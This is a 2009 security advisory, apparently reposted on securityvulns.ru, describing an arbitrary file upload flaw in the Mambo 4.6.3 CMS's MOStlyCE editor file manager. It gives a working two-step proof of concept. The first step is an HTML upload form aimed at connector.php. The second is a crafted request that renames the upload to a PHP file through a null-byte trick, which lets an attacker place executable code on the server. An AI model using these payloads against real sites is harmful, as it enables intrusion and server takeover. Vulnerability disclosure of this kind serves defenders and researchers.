Computer Security

Security Advisory: Mambo 4.6.3 arbitrary file upload
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  XSS and Content Spoofing vulnerabilities in FCKeditor

  rubrique 'rubrique.
php' SQL Injection Vulnerability

  Dawaween V 1.03 <<----SQL Injection Exploit

  Advisory 01/2009: Horde_Form_Type_image
Arbitrary File Overwrite Vulnerability

From:Paweі Јaskarzewski <kl3ryk_(at)_gmail.com>
Date:21.09.2009
Subject:Mambo 4.6.3 arbitrary file upload

Step 1) Using post method send file to:

http://victim.com/mambo4.6.5/mambots/editors/mostlyce/jscripts/tiny_mce/filemanag
er/connectors/php/connector.php?Command=FileUpload

file should have one of the following extensions:
zip, doc, xls, pdf, rtf, csv, jpg, gif, jpeg, png, avi, mpg, mpeg, swf, fla

POC:
<form action="http://victim.com/mambo4.6.5/mambots/editors/mostlyce/jscripts/tiny_
mce/filemanager/connectors/php/connector.php?Command=FileUpload"
method="post" enctype="multipart/form-data">
 <input type="file" name="NewFile"></input>
 <input type="submit" value="submit"></input>
</form>

Step 2) Using known bug in this version of mambo rename that file.

POC:
http://victim.com/mambo4.6.3/mambots/editors/mostlyce/jscripts/tiny_mce/filemanag
er/connectors/php/connector.php?Command=FileUpload&file=a&file[NewFile][n
ame]=myscript.php%00.jpg&file[NewFile][tmp_name]=/home/victim/victim.
com/UserFiles/File/abc.gif&file[NewFile][size]=1&CurrentFolder=


path to "UserFiles" you can get using another known bug which is
described here:
http://www.securityfocus.com/archive/1/archive/1/487128/100/200/threaded
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru